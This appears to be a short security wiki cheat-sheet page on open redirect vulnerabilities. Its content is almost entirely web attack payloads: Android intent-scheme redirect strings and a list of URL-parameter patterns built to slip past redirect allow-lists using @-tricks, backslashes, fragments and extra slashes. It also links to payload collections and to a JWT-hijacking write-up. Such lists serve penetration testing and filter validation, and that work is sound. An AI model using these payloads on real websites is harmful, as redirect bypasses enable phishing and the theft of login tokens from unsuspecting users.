Open Redirect
What is it?
Exploitation
Example Payloads
@sirdarckcat example open redirect
http://evilwebsite.com/xss.php?redir_xss=intent://anyhostname.com/anypath?etc#Intent;package=x;S.browser_fallback_url=https://envil.website;end;%20
Shorter payload:
intent://anyhostname.com#Intent;scheme=evil.website;end
Cheat sheet
Basic Attack [ref1]
?url=https://www.hahwul.com
Open Redirect bypass pattern
?url=https://allow_domain.hahwul.com
?url=https://[email protected]
?url=https://www.hahwul.com#allow_domain
?url=https://www.hahwul.com?allow_domain
?url=https://www.hahwul.com\allow_domain
?url=https://www.hahwul.com&allow_domain
?url=http:///////////www.hahwul.com
?url=http:\\www.hahwul.com
?url=http:\/\/www.hahwul.com
Other Resources
swisskyrepo's PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect/Intruder
Hijacking accounts by retrieving JWT tokens via unvalidated redirects https://www.shawarkhan.com/2019/01/hijacking-accounts-by-retrieving-jwt.html
References
[ref1] : https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1
Last updated
Was this helpful?